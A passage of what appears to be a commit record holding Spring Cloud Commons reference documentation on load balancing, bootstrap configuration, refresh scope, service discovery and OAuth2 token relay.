to the `ServiceInstanceListSupplier` class.\n\nTIP:: You can also use our alternative predefined configurations in place of the default ones by setting the value of `spring.cloud.loadbalancer.configurations` property to `zone-preference` to use `ZonePreferenceServiceInstanceListSupplier` with caching or to `health-check` to use `HealthCheckServiceInstanceListSupplier` with caching.\n====\n\nYou can use this feature to instantiate different implementations of `ServiceInstanceListSupplier` or `ReactorLoadBalancer`, either written by you, or provided by us as alternatives (for example `ZonePreferenceServiceInstanceListSupplier`) to override the default setup.\n\nYou can see an example of a custom configuration <<zoned-based-custom-loadbalancer-configuration,here>>.\n\nNOTE: The annotation `value` arguments (`stores` in the example above) specifies the service id of the service that we should send the requests to with the given custom configuration.\n\nYou can also pass multiple configurations (for more than one load-balancer client) through the `@LoadBalancerClients` annotation, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\n@LoadBalancerClients({@LoadBalancerClient(value = \"stores\", configuration = StoresLoadBalancerClientConfiguration.class), @LoadBalancerClient(value = \"customers\", configuration = CustomersLoadBalancerClientConfiguration.class)})\npublic class MyConfiguration {\n\n\t@Bean\n\t@LoadBalanced\n\tpublic WebClient.Builder loadBalancedWebClientBuilder() {\n\t\treturn WebClient.builder();\n\t}\n}\n----\n\nNOTE: The classes you pass as `@LoadBalancerClient` or `@LoadBalancerClients` configuration arguments should either not be annotated with `@Configuration` or be outside component scan scope.\n\n====\n\n[[loadbalancer-lifecycle]]\n=== Spring Cloud LoadBalancer Lifecycle\n\nOne type of bean that it may be useful to register using <<custom-loadbalancer-configuration,Custom LoadBalancer configuration>> is `LoadBalancerLifecycle`.\n\nThe `LoadBalancerLifecycle` beans provide callback methods, named `onStart(Request<RC> request)`, `onStartRequest(Request<RC> request, Response<T> lbResponse)` and `onComplete(CompletionContext<RES, T, RC> completionContext)`, that you should implement to specify what actions should take place before and after load-balancing.\n\n`onStart(Request<RC> request)` takes a `Request` object as a parameter. It contains data that is used to select an appropriate instance, including the downstream client request and <<spring-cloud-loadbalancer-hints,hint>>. `onStartRequest` also takes the `Request` object and, additionally, the `Response<T>` object as parameters. On the other hand, a `CompletionContext` object is provided to the `onComplete(CompletionContext<RES, T, RC> completionContext)` method. It contains the LoadBalancer `Response`, including the selected service instance, the `Status` of the request executed against that service instance and (if available) the response returned to the downstream client, and (if an exception has occurred) the corresponding `Throwable`.\n\nThe `supports(Class requestContextClass, Class responseClass,\nClass serverTypeClass)` method can be used to determine whether the processor in question handles objects of provided types. 
If not overridden by the user, it returns `true`.\n\nNOTE: In the preceding method calls, `RC` means `RequestContext` type, `RES` means client response type, and `T` means returned server type.\n\n[[loadbalancer-micrometer-stats-lifecycle]]\n=== Spring Cloud LoadBalancer Statistics\n\nWe provide a `LoadBalancerLifecycle` bean called `MicrometerStatsLoadBalancerLifecycle`, which uses Micrometer to provide statistics for load-balanced calls.\n\nIn order to get this bean added to your application context,\nset the value of the `spring.cloud.loadbalancer.stats.micrometer.enabled` to `true` and have a `MeterRegistry` available (for example, by adding https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/production-ready-features.html[Spring Boot Actuator] to your project).\n\n`MicrometerStatsLoadBalancerLifecycle` registers the following meters in `MeterRegistry`:\n\n* `loadbalancer.requests.active`: A gauge that allows you to monitor the number of currently active requests for any service instance (service instance data available via tags);\n* `loadbalancer.requests.success`: A timer that measures the time of execution of any load-balanced requests that have ended in passing a response on to the underlying client;\n* `loadbalancer.requests.failed`: A timer that measures the time of execution of any load-balanced requests that have ended with an exception;\n* `loadbalancer.requests.discard`: A counter that measures the number of discarded load-balanced requests, i.e. requests where a service instance to run the request on has not been retrieved by the LoadBalancer.\n\nAdditional information regarding the service instances, request data, and response data is added to metrics via tags whenever available.\n\nNOTE: For some implementations, such as `BlockingLoadBalancerClient`, request and response data might not be available, as we establish generic types from arguments and might not be able to determine the types and read the data.\n\nNOTE: The meters are registered in the registry when at least one record is added for a given meter.\n\nTIP: You can further configure the behavior of those metrics (for example, add https:\/\/micrometer.io\/docs\/concepts#_histograms_and_percentiles[publishing percentiles and histograms]) by https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/production-ready-features.html#production-ready-metrics-per-meter-properties[adding `MeterFilters`].\n\n== Spring Cloud Circuit Breaker\n\ninclude::spring-cloud-circuitbreaker.adoc[leveloffset=+1]\n\n== CachedRandomPropertySource\n\nSpring Cloud Context provides a `PropertySource` that caches random values based on a key. Outside of the caching\nfunctionality it works the same as Spring Boot's https:\/\/github.com\/spring-projects\/spring-boot\/blob\/main\/spring-boot-project\/spring-boot\/src\/main\/java\/org\/springframework\/boot\/env\/RandomValuePropertySource.java[`RandomValuePropertySource`].\nThis random value might be useful in the case where you want a random value that is consistent even after the Spring Application\ncontext restarts. The property value takes the form of `cachedrandom.[yourkey].[type]` where `yourkey` is the key in the cache. 
The `type` value can\nbe any type supported by Spring Boot's `RandomValuePropertySource`.\n\n====\n[source,properties,indent=0]\n----\nmyrandom=${cachedrandom.appname.value}\n----\n====\n\n[[spring-cloud-security]]\n== Security\n\n[[spring-cloud-security-single-sign-on]]\n=== Single Sign On\n\nNOTE: All of the OAuth2 SSO and resource server features moved to Spring Boot\nin version 1.3. You can find documentation in the\nhttps:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/[Spring Boot user guide].\n\n[[spring-cloud-security-client-token-relay]]\n==== Client Token Relay\n\nIf your app is a user facing OAuth2 client (i.e. has declared\n`@EnableOAuth2Sso` or `@EnableOAuth2Client`) then it has an\n`OAuth2ClientContext` in request scope from Spring Boot. You can\ncreate your own `OAuth2RestTemplate` from this context and an\nautowired `OAuth2ProtectedResourceDetails`, and then the context will\nalways forward the access token downstream, also refreshing the access\ntoken automatically if it expires. (These are features of Spring\nSecurity and Spring Boot.)\n\n[[spring-cloud-security-resource-server-token-relay]]\n==== Resource Server Token Relay\n\nIf your app has `@EnableResourceServer` you might want to relay the\nincoming token downstream to other services. If you use a\n`RestTemplate` to contact the downstream services then this is just a\nmatter of how to create the template with the right context.\n\nIf your service uses `UserInfoTokenServices` to authenticate incoming\ntokens (i.e. it is using the `security.oauth2.user-info-uri`\nconfiguration), then you can simply create an `OAuth2RestTemplate`\nusing an autowired `OAuth2ClientContext` (it will be populated by the\nauthentication process before it hits the backend code). Equivalently\n(with Spring Boot 1.4), you could inject a\n`UserInfoRestTemplateFactory` and grab its `OAuth2RestTemplate` in\nyour configuration. For example:\n\n.MyConfiguration.java\n[source,java]\n----\n@Bean\npublic OAuth2RestTemplate restTemplate(UserInfoRestTemplateFactory factory) {\n return factory.getUserInfoRestTemplate();\n}\n----\n\nThis rest template will then have the same `OAuth2ClientContext`\n(request-scoped) that is used by the authentication filter, so you can\nuse it to send requests with the same access token.\n\nIf your app is not using `UserInfoTokenServices` but is still a client\n(i.e. it declares `@EnableOAuth2Client` or `@EnableOAuth2Sso`), then\nwith Spring Security Cloud any `OAuth2RestOperations` that the user\ncreates from an `@Autowired` `OAuth2Context` will also forward\ntokens. This feature is implemented by default as an MVC handler\ninterceptor, so it only works in Spring MVC. If you are not using MVC\nyou could use a custom filter or AOP interceptor wrapping an\n`AccessTokenContextRelay` to provide the same feature.\n\nHere's a basic\nexample showing the use of an autowired rest template created\nelsewhere (\"foo.com\" is a Resource Server accepting the same tokens as\nthe surrounding app):\n\n.MyController.java\n[source,java]\n----\n@Autowired\nprivate OAuth2RestOperations restTemplate;\n\n@RequestMapping(\"\/relay\")\npublic String relay() {\n ResponseEntity<String> response =\n restTemplate.getForEntity(\"https:\/\/foo.com\/bar\", String.class);\n return \"Success! 
(\" + response.getBody() + \")\";\n}\n----\n\nIf you don't want to forward tokens (and that is a valid\nchoice, since you might want to act as yourself, rather than the\nclient that sent you the token), then you only need to create your own\n`OAuth2Context` instead of autowiring the default one.\n\nFeign clients will also pick up an interceptor that uses the\n`OAuth2ClientContext` if it is available, so they should also do a\ntoken relay anywhere where a `RestTemplate` would.\n\n== Configuration Properties\n\nTo see the list of all Spring Cloud Commons related configuration properties please check link:appendix.html[the Appendix page].\n","old_contents":"= Cloud Native Applications\ninclude::_attributes.adoc[]\n\ninclude::intro.adoc[]\n\n\/\/ TODO: figure out remote includes in docs and replace pasted text\n\/\/ include::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/docs\/src\/main\/asciidoc\/contributing-docs.adoc[]\nNOTE: Spring Cloud is released under the non-restrictive Apache 2.0 license.\nIf you would like to contribute to this section of the documentation or if you find an error, you can find the source code and issue trackers for the project at {docslink}[github].\n\n== Spring Cloud Context: Application Context Services\n\nSpring Boot has an opinionated view of how to build an application with Spring.\nFor instance, it has conventional locations for common configuration files and has endpoints for common management and monitoring tasks.\nSpring Cloud builds on top of that and adds a few features that many components in a system would use or occasionally need.\n\n=== The Bootstrap Application Context\n\nA Spring Cloud application operates by creating a \"`bootstrap`\" context, which is a parent context for the main application.\nThis context is responsible for loading configuration properties from the external sources and for decrypting properties in the local external configuration files.\nThe two contexts share an `Environment`, which is the source of external properties for any Spring application.\nBy default, bootstrap properties (not `bootstrap.properties` but properties that are loaded during the bootstrap phase) are added with high precedence, so they cannot be overridden by local configuration.\n\nThe bootstrap context uses a different convention for locating external configuration than the main application context.\nInstead of `application.yml` (or `.properties`), you can use `bootstrap.yml`, keeping the external configuration for bootstrap and main context nicely separate.\nThe following listing shows an example:\n\n.bootstrap.yml\n====\n----\nspring:\n application:\n name: foo\n cloud:\n config:\n uri: ${SPRING_CONFIG_URI:http:\/\/localhost:8888}\n----\n====\n\nIf your application needs any application-specific configuration from the server, it is a good idea to set the `spring.application.name` (in `bootstrap.yml` or `application.yml`).\nFor the property `spring.application.name` to be used as the application's context ID, you must set it in `bootstrap.[properties | yml]`.\n\nIf you want to retrieve specific profile configuration, you should also set `spring.profiles.active` in `bootstrap.[properties | yml]`.\n\nYou can disable the bootstrap process completely by setting `spring.cloud.bootstrap.enabled=false` (for example, in system properties).\n\n=== Application Context Hierarchies\n\nIf you build an application context from `SpringApplication` or `SpringApplicationBuilder`, the Bootstrap context is added as a parent to that 
context.\nIt is a feature of Spring that child contexts inherit property sources and profiles from their parent, so the \"`main`\" application context contains additional property sources, compared to building the same context without Spring Cloud Config.\nThe additional property sources are:\n\n* \"`bootstrap`\": If any `PropertySourceLocators` are found in the bootstrap context and if they have non-empty properties, an optional `CompositePropertySource` appears with high priority.\nAn example would be properties from the Spring Cloud Config Server.\nSee \"`<<customizing-bootstrap-property-sources>>`\" for how to customize the contents of this property source.\n\n* \"`applicationConfig: [classpath:bootstrap.yml]`\" (and related files if Spring profiles are active): If you have a `bootstrap.yml` (or `.properties`), those properties are used to configure the bootstrap context.\nThen they get added to the child context when its parent is set.\nThey have lower precedence than the `application.yml` (or `.properties`) and any other property sources that are added to the child as a normal part of the process of creating a Spring Boot application.\nSee \"`<<customizing-bootstrap-properties>>`\" for how to customize the contents of these property sources.\n\nBecause of the ordering rules of property sources, the \"`bootstrap`\" entries take precedence.\nHowever, note that these do not contain any data from `bootstrap.yml`, which has very low precedence but can be used to set defaults.\n\nYou can extend the context hierarchy by setting the parent context of any `ApplicationContext` you create -- for example, by using its own interface or with the `SpringApplicationBuilder` convenience methods (`parent()`, `child()` and `sibling()`).\nThe bootstrap context is the parent of the most senior ancestor that you create yourself.\nEvery context in the hierarchy has its own \"`bootstrap`\" (possibly empty) property source to avoid promoting values inadvertently from parents down to their descendants.\nIf there is a config server, every context in the hierarchy can also (in principle) have a different `spring.application.name` and, hence, a different remote property source.\nNormal Spring application context behavior rules apply to property resolution: properties from a child context override those in\nthe parent, by name and also by property source name.\n(If the child has a property source with the same name as the parent, the value from the parent is not included in the child).\n\nNote that the `SpringApplicationBuilder` lets you share an `Environment` amongst the whole hierarchy, but that is not the default.\nThus, sibling contexts (in particular) do not need to have the same profiles or property sources, even though they may share common values with their parent.\n\n[[customizing-bootstrap-properties]]\n=== Changing the Location of Bootstrap Properties\n\nThe `bootstrap.yml` (or `.properties`) location can be specified by setting `spring.cloud.bootstrap.name` (default: `bootstrap`), `spring.cloud.bootstrap.location` (default: empty) or `spring.cloud.bootstrap.additional-location` (default: empty) -- for example, in System properties.\n\nThose properties behave like the `spring.config.*` variants with the same name.\nWith `spring.cloud.bootstrap.location` the default locations are replaced and only the specified ones are used.\nTo add locations to the list of default ones, `spring.cloud.bootstrap.additional-location` could be used.\nIn fact, they are used to set up the bootstrap `ApplicationContext` by 
setting those properties in its `Environment`.\nIf there is an active profile (from `spring.profiles.active` or through the `Environment` API in the context you are building), properties in that profile get loaded as well, the same as in a regular Spring Boot app -- for example, from `bootstrap-development.properties` for a `development` profile.\n\n[[overriding-bootstrap-properties]]\n=== Overriding the Values of Remote Properties\n\nThe property sources that are added to your application by the bootstrap context are often \"`remote`\" (from example, from Spring Cloud Config Server).\nBy default, they cannot be overridden locally.\nIf you want to let your applications override the remote properties with their own system properties or config files, the remote property source has to grant it permission by setting `spring.cloud.config.allowOverride=true` (it does not work to set this locally).\nOnce that flag is set, two finer-grained settings control the location of the remote properties in relation to system properties and the application's local configuration:\n\n* `spring.cloud.config.overrideNone=true`: Override from any local property source.\n* `spring.cloud.config.overrideSystemProperties=false`: Only system properties, command line arguments, and environment variables (but not the local config files) should override the remote settings.\n\n=== Customizing the Bootstrap Configuration\n\nThe bootstrap context can be set to do anything you like by adding entries to `\/META-INF\/spring.factories` under a key named `org.springframework.cloud.bootstrap.BootstrapConfiguration`.\nThis holds a comma-separated list of Spring `@Configuration` classes that are used to create the context.\nAny beans that you want to be available to the main application context for autowiring can be created here.\nThere is a special contract for `@Beans` of type `ApplicationContextInitializer`.\nIf you want to control the startup sequence, you can mark classes with the `@Order` annotation (the default order is `last`).\n\nWARNING: When adding custom `BootstrapConfiguration`, be careful that the classes you add are not `@ComponentScanned` by mistake into your \"`main`\" application context, where they might not be needed.\nUse a separate package name for boot configuration classes and make sure that name is not already covered by your `@ComponentScan` or `@SpringBootApplication` annotated configuration classes.\n\nThe bootstrap process ends by injecting initializers into the main `SpringApplication` instance (which is the normal Spring Boot startup sequence, whether it runs as a standalone application or is deployed in an application server).\nFirst, a bootstrap context is created from the classes found in `spring.factories`.\nThen, all `@Beans` of type `ApplicationContextInitializer` are added to the main `SpringApplication` before it is started.\n\n[[customizing-bootstrap-property-sources]]\n=== Customizing the Bootstrap Property Sources\n\nThe default property source for external configuration added by the bootstrap process is the Spring Cloud Config Server, but you can add additional sources by adding beans of type `PropertySourceLocator` to the bootstrap context (through `spring.factories`).\nFor instance, you can insert additional properties from a different server or from a database.\n\nAs an example, consider the following custom locator:\n\n====\n[source,java]\n----\n@Configuration\npublic class CustomPropertySourceLocator implements PropertySourceLocator {\n\n @Override\n public PropertySource<?> 
locate(Environment environment) {\n return new MapPropertySource(\"customProperty\",\n Collections.<String, Object>singletonMap(\"property.from.sample.custom.source\", \"worked as intended\"));\n }\n\n}\n----\n====\n\nThe `Environment` that is passed in is the one for the `ApplicationContext` about to be created -- in other words, the one for which we supply additional property sources.\nIt already has its normal Spring Boot-provided property sources, so you can use those to locate a property source specific to this `Environment` (for example, by keying it on `spring.application.name`, as is done in the default Spring Cloud Config Server property source locator).\n\nIf you create a jar with this class in it and then add a `META-INF\/spring.factories` containing the following setting, the `customProperty` `PropertySource` appears in any application that includes that jar on its classpath:\n\n====\n[source]\n----\norg.springframework.cloud.bootstrap.BootstrapConfiguration=sample.custom.CustomPropertySourceLocator\n----\n====\n\n=== Logging Configuration\n\nIf you use Spring Boot to configure log settings, you should place this configuration in `bootstrap.[yml | properties]` if you would like it to apply to all events.\n\nNOTE: For Spring Cloud to initialize logging configuration properly, you cannot use a custom prefix.\nFor example, using `custom.loggin.logpath` is not recognized by Spring Cloud when initializing the logging system.\n\n=== Environment Changes\n\nThe application listens for an `EnvironmentChangeEvent` and reacts to the change in a couple of standard ways (additional `ApplicationListeners` can be added as `@Beans` in the normal way).\nWhen an `EnvironmentChangeEvent` is observed, it has a list of key values that have changed, and the application uses those to:\n\n* Re-bind any `@ConfigurationProperties` beans in the context.\n* Set the logger levels for any properties in `logging.level.*`.\n\nNote that the Spring Cloud Config Client does not, by default, poll for changes in the `Environment`.\nGenerally, we would not recommend that approach for detecting changes (although you could set it up with a\n`@Scheduled` annotation).\nIf you have a scaled-out client application, it is better to broadcast the `EnvironmentChangeEvent` to all the instances instead of having them polling for changes (for example, by using the https:\/\/github.com\/spring-cloud\/spring-cloud-bus[Spring Cloud Bus]).\n\nThe `EnvironmentChangeEvent` covers a large class of refresh use cases, as long as you can actually make a change to the `Environment` and publish the event.\nNote that those APIs are public and part of core Spring).\nYou can verify that the changes are bound to `@ConfigurationProperties` beans by visiting the `\/configprops` endpoint (a standard Spring Boot Actuator feature).\nFor instance, a `DataSource` can have its `maxPoolSize` changed at runtime (the default `DataSource` created by Spring Boot is a `@ConfigurationProperties` bean) and grow capacity dynamically.\nRe-binding `@ConfigurationProperties` does not cover another large class of use cases, where you need more control over the refresh and where you need a change to be atomic over the whole `ApplicationContext`.\nTo address those concerns, we have `@RefreshScope`.\n\n[[refresh-scope]]\n=== Refresh Scope\n\nWhen there is a configuration change, a Spring `@Bean` that is marked as `@RefreshScope` gets special treatment.\nThis feature addresses the problem of stateful beans that get their configuration injected only when they are 
initialized.\nFor instance, if a `DataSource` has open connections when the database URL is changed through the `Environment`, you probably want the holders of those connections to be able to complete what they are doing.\nThen, the next time something borrows a connection from the pool, it gets one with the new URL.\n\nSometimes, it might even be mandatory to apply the `@RefreshScope` annotation on some beans that can be only initialized once.\nIf a bean is \"`immutable`\", you have to either annotate the bean with `@RefreshScope` or specify the classname under the property key: `spring.cloud.refresh.extra-refreshable`.\n\nWARNING: If you hava a `DataSource` bean that is a `HikariDataSource`, it can not be\nrefreshed. It is the default value for `spring.cloud.refresh.never-refreshable`. Choose a\ndifferent `DataSource` implementation if you need it to be refreshed.\n\nRefresh scope beans are lazy proxies that initialize when they are used (that is, when a method is called), and the scope acts as a cache of initialized values.\nTo force a bean to re-initialize on the next method call, you must invalidate its cache entry.\n\nThe `RefreshScope` is a bean in the context and has a public `refreshAll()` method to refresh all beans in the scope by clearing the target cache.\nThe `\/refresh` endpoint exposes this functionality (over HTTP or JMX).\nTo refresh an individual bean by name, there is also a `refresh(String)` method.\n\nTo expose the `\/refresh` endpoint, you need to add following configuration to your application:\n\n====\n[source,yaml]\n----\nmanagement:\n endpoints:\n web:\n exposure:\n include: refresh\n----\n====\n\nNOTE: `@RefreshScope` works (technically) on a `@Configuration` class, but it might lead to surprising behavior.\nFor example, it does not mean that all the `@Beans` defined in that class are themselves in `@RefreshScope`.\nSpecifically, anything that depends on those beans cannot rely on them being updated when a refresh is initiated, unless it is itself in `@RefreshScope`.\nIn that case, it is rebuilt on a refresh and its dependencies are re-injected.\nAt that point, they are re-initialized from the refreshed `@Configuration`).\n\n=== Encryption and Decryption\n\nSpring Cloud has an `Environment` pre-processor for decrypting property values locally.\nIt follows the same rules as the Spring Cloud Config Server and has the same external configuration through `encrypt.\\*`.\nThus, you can use encrypted values in the form of `{cipher}*`, and, as long as there is a valid key, they are decrypted before the main application context gets the `Environment` settings.\nTo use the encryption features in an application, you need to include Spring Security RSA in your classpath (Maven co-ordinates: `org.springframework.security:spring-security-rsa`), and you also need the full strength JCE extensions in your JVM.\n\ninclude::jce.adoc[]\n\n=== Endpoints\n\nFor a Spring Boot Actuator application, some additional management endpoints are available. 
You can use:\n\n* `POST` to `\/actuator\/env` to update the `Environment` and rebind `@ConfigurationProperties` and log levels.\n To enabled this endpoint you must set `management.endpoint.env.post.enabled=true`.\n* `\/actuator\/refresh` to re-load the boot strap context and refresh the `@RefreshScope` beans.\n* `\/actuator\/restart` to close the `ApplicationContext` and restart it (disabled by default).\n* `\/actuator\/pause` and `\/actuator\/resume` for calling the `Lifecycle` methods (`stop()` and `start()` on the `ApplicationContext`).\n\nNOTE: If you disable the `\/actuator\/restart` endpoint then the `\/actuator\/pause` and `\/actuator\/resume` endpoints\nwill also be disabled since they are just a special case of `\/actuator\/restart`.\n\n== Spring Cloud Commons: Common Abstractions\n\nPatterns such as service discovery, load balancing, and circuit breakers lend themselves to a common abstraction layer that can be consumed by all Spring Cloud clients, independent of the implementation (for example, discovery with Eureka or Consul).\n\n[[discovery-client]]\n=== The `@EnableDiscoveryClient` Annotation\n\nSpring Cloud Commons provides the `@EnableDiscoveryClient` annotation.\nThis looks for implementations of the `DiscoveryClient` and `ReactiveDiscoveryClient` interfaces with `META-INF\/spring.factories`.\nImplementations of the discovery client add a configuration class to `spring.factories` under the `org.springframework.cloud.client.discovery.EnableDiscoveryClient` key.\nExamples of `DiscoveryClient` implementations include https:\/\/cloud.spring.io\/spring-cloud-netflix\/[Spring Cloud Netflix Eureka], https:\/\/cloud.spring.io\/spring-cloud-consul\/[Spring Cloud Consul Discovery], and https:\/\/cloud.spring.io\/spring-cloud-zookeeper\/[Spring Cloud Zookeeper Discovery].\n\nSpring Cloud will provide both the blocking and reactive service discovery clients by default.\nYou can disable the blocking and\/or reactive clients easily by setting `spring.cloud.discovery.blocking.enabled=false` or `spring.cloud.discovery.reactive.enabled=false`.\nTo completely disable service discovery you just need to set `spring.cloud.discovery.enabled=false`.\n\nBy default, implementations of `DiscoveryClient` auto-register the local Spring Boot server with the remote discovery server.\nThis behavior can be disabled by setting `autoRegister=false` in `@EnableDiscoveryClient`.\n\nNOTE: `@EnableDiscoveryClient` is no longer required.\nYou can put a `DiscoveryClient` implementation on the classpath to cause the Spring Boot application to register with the service discovery server.\n\n==== Health Indicators\n\nCommons auto-configures the following Spring Boot health indicators.\n\n===== DiscoveryClientHealthIndicator\nThis health indicator is based on the currently registered `DiscoveryClient` implementation.\n\n* To disable entirely, set `spring.cloud.discovery.client.health-indicator.enabled=false`.\n* To disable the description field, set `spring.cloud.discovery.client.health-indicator.include-description=false`.\nOtherwise, it can bubble up as the `description` of the rolled up `HealthIndicator`.\n* To disable service retrieval, set `spring.cloud.discovery.client.health-indicator.use-services-query=false`.\nBy default, the indicator invokes the client's `getServices` method. In deployments with many registered services it may too\ncostly to retrieve all services during every check. 
This will skip the service retrieval and instead use the client's `probe` method.\n\n===== DiscoveryCompositeHealthContributor\nThis composite health indicator is based on all registered `DiscoveryHealthIndicator` beans. To disable,\nset `spring.cloud.discovery.client.composite-indicator.enabled=false`.\n\n==== Ordering `DiscoveryClient` instances\n`DiscoveryClient` interface extends `Ordered`. This is useful when using multiple discovery\n clients, as it allows you to define the order of the returned discovery clients, similar to\nhow you can order the beans loaded by a Spring application. By default, the order of any `DiscoveryClient` is set to\n`0`. If you want to set a different order for your custom `DiscoveryClient` implementations, you just need to override\nthe `getOrder()` method so that it returns the value that is suitable for your setup. Apart from this, you can use\nproperties to set the order of the `DiscoveryClient`\nimplementations provided by Spring Cloud, among others `ConsulDiscoveryClient`, `EurekaDiscoveryClient` and\n`ZookeeperDiscoveryClient`. In order to do it, you just need to set the\n`spring.cloud.{clientIdentifier}.discovery.order` (or `eureka.client.order` for Eureka) property to the desired value.\n\n==== SimpleDiscoveryClient\n\nIf there is no Service-Registry-backed `DiscoveryClient` in the classpath, `SimpleDiscoveryClient`\ninstance, that uses properties to get information on service and instances, will be used.\n\nThe information about the available instances should be passed to via properties in the following format:\n`spring.cloud.discovery.client.simple.instances.service1[0].uri=http:\/\/s11:8080`, where\n`spring.cloud.discovery.client.simple.instances` is the common prefix, then `service1` stands\nfor the ID of the service in question, while `[0]` indicates the index number of the instance\n(as visible in the example, indexes start with `0`), and then the value of `uri` is\nthe actual URI under which the instance is available.\n\n=== ServiceRegistry\n\nCommons now provides a `ServiceRegistry` interface that provides methods such as `register(Registration)` and `deregister(Registration)`, which let you provide custom registered services.\n`Registration` is a marker interface.\n\nThe following example shows the `ServiceRegistry` in use:\n\n====\n[source,java,indent=0]\n----\n@Configuration\n@EnableDiscoveryClient(autoRegister=false)\npublic class MyConfiguration {\n private ServiceRegistry registry;\n\n public MyConfiguration(ServiceRegistry registry) {\n this.registry = registry;\n }\n\n \/\/ called through some external process, such as an event or a custom actuator endpoint\n public void register() {\n Registration registration = constructRegistration();\n this.registry.register(registration);\n }\n}\n----\n====\n\nEach `ServiceRegistry` implementation has its own `Registry` implementation.\n\n* `ZookeeperRegistration` used with `ZookeeperServiceRegistry`\n* `EurekaRegistration` used with `EurekaServiceRegistry`\n* `ConsulRegistration` used with `ConsulServiceRegistry`\n\nIf you are using the `ServiceRegistry` interface, you are going to need to pass the\ncorrect `Registry` implementation for the `ServiceRegistry` implementation you\nare using.\n\n\n==== ServiceRegistry Auto-Registration\n\nBy default, the `ServiceRegistry` implementation auto-registers the running service.\nTo disable that behavior, you can set:\n* `@EnableDiscoveryClient(autoRegister=false)` to permanently disable auto-registration.\n* 
`spring.cloud.service-registry.auto-registration.enabled=false` to disable the behavior through configuration.\n\n===== ServiceRegistry Auto-Registration Events\n\nThere are two events that will be fired when a service auto-registers. The first event, called\n`InstancePreRegisteredEvent`, is fired before the service is registered. The second\nevent, called `InstanceRegisteredEvent`, is fired after the service is registered. You can register an\n`ApplicationListener`(s) to listen to and react to these events.\n\nNOTE: These events will not be fired if the `spring.cloud.service-registry.auto-registration.enabled` property is set to `false`.\n\n==== Service Registry Actuator Endpoint\n\nSpring Cloud Commons provides a `\/service-registry` actuator endpoint.\nThis endpoint relies on a `Registration` bean in the Spring Application Context.\nCalling `\/service-registry` with GET returns the status of the `Registration`.\nUsing POST to the same endpoint with a JSON body changes the status of the current `Registration` to the new value.\nThe JSON body has to include the `status` field with the preferred value.\nPlease see the documentation of the `ServiceRegistry` implementation you use for the allowed values when updating the status and the values returned for the status.\nFor instance, Eureka's supported statuses are `UP`, `DOWN`, `OUT_OF_SERVICE`, and `UNKNOWN`.\n\n[[rest-template-loadbalancer-client]]\n=== Spring RestTemplate as a Load Balancer Client\n\nYou can configure a `RestTemplate` to use a Load-balancer client.\nTo create a load-balanced `RestTemplate`, create a `RestTemplate` `@Bean` and use the `@LoadBalanced` qualifier, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @LoadBalanced\n @Bean\n RestTemplate restTemplate() {\n return new RestTemplate();\n }\n}\n\npublic class MyClass {\n @Autowired\n private RestTemplate restTemplate;\n\n public String doOtherStuff() {\n String results = restTemplate.getForObject(\"http:\/\/stores\/stores\", String.class);\n return results;\n }\n}\n----\n====\n\nCAUTION: A `RestTemplate` bean is no longer created through auto-configuration.\nIndividual applications must create it.\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe BlockingLoadBalancerClient is used to create a full physical address.\n\nIMPORTANT: To use a load-balanced `RestTemplate`, you need to have a load-balancer implementation in your classpath.\nAdd <<spring-cloud-loadbalancer-starter, Spring Cloud LoadBalancer starter>> to your project in order to use it.\n\n[[webclinet-loadbalancer-client]]\n=== Spring WebClient as a Load Balancer Client\n\nYou can configure `WebClient` to automatically use a load-balancer client.\nTo create a load-balanced `WebClient`, create a `WebClient.Builder` `@Bean` and use the `@LoadBalanced` qualifier, as follows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n\t@Bean\n\t@LoadBalanced\n\tpublic WebClient.Builder loadBalancedWebClientBuilder() {\n\t\treturn WebClient.builder();\n\t}\n}\n\npublic class MyClass {\n @Autowired\n private WebClient.Builder webClientBuilder;\n\n public Mono<String> doOtherStuff() {\n return webClientBuilder.build().get().uri(\"http:\/\/stores\/stores\")\n \t\t\t\t.retrieve().bodyToMono(String.class);\n }\n}\n----\n====\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe Spring Cloud LoadBalancer is used to create a full physical 
address.\n\nIMPORTANT: If you want to use a `@LoadBalanced WebClient.Builder`, you need to have a load balancer\nimplementation in the classpath. We recommend that you add the\n<<spring-cloud-loadbalancer-starter, Spring Cloud LoadBalancer starter>> to your project.\nThen, `ReactiveLoadBalancer` is used underneath.\n\n==== Retrying Failed Requests\n\nA load-balanced `RestTemplate` can be configured to retry failed requests.\nBy default, this logic is disabled.\nFor the non-reactive version (with `RestTemplate`), you can enable it by adding link:https:\/\/github.com\/spring-projects\/spring-retry[Spring Retry] to your application's classpath. For the reactive version (with `WebTestClient), you need to set `spring.cloud.loadbalancer.retry.enabled=true`.\n\nIf you would like to disable the retry logic with Spring Retry or Reactive Retry on the classpath, you can set `spring.cloud.loadbalancer.retry.enabled=false`.\n\nFor the non-reactive implementation, if you would like to implement a `BackOffPolicy` in your retries, you need to create a bean of type `LoadBalancedRetryFactory` and override the `createBackOffPolicy()` method.\n\nFor the reactive implementation, you just need to enable it by setting `spring.cloud.loadbalancer.retry.backoff.enabled` to `false`.\n\nYou can set:\n\n- `spring.cloud.loadbalancer.retry.maxRetriesOnSameServiceInstance` - indicates how many times a request should be retried on the same `ServiceInstance` (counted separately for every selected instance)\n- `spring.cloud.loadbalancer.retry.maxRetriesOnNextServiceInstance` - indicates how many times a request should be retried a newly selected `ServiceInstance`\n- `spring.cloud.loadbalancer.retry.retryableStatusCodes` - the status codes on which to always retry a failed request.\n\nFor the reactive implementation, you can additionally set:\n - `spring.cloud.loadbalancer.retry.backoff.minBackoff` - Sets the minimum backoff duration (by default, 5 milliseconds)\n - `spring.cloud.loadbalancer.retry.backoff.maxBackoff` - Sets the maximum backoff duration (by default, max long value of milliseconds)\n - `spring.cloud.loadbalancer.retry.backoff.jitter` - Sets the jitter used for calculationg the actual backoff duration for each call (by default, 0.5).\n\nFor the reactive implementation, you can also implement your own `LoadBalancerRetryPolicy` to have more detailed control over the load-balanced call retries.\n\nNOTE: For load-balanced retries, by default, we wrap the `ServiceInstanceListSupplier` bean with `RetryAwareServiceInstanceListSupplier` to select a different instance from the one previously chosen, if available. 
